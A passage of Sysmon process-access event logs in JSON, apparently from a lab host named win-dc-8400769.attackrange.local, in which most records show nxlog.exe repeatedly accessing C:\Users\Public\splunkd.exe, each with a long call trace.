(x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:38.279","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2933,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:39.282\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:39.282","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2934,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:40.285\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:40.285","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2935,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:41.287\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:41.287","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2936,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:42.290\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:42.290","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2937,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:43.292\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:43.292","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2938,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:44.295\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:44.295","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 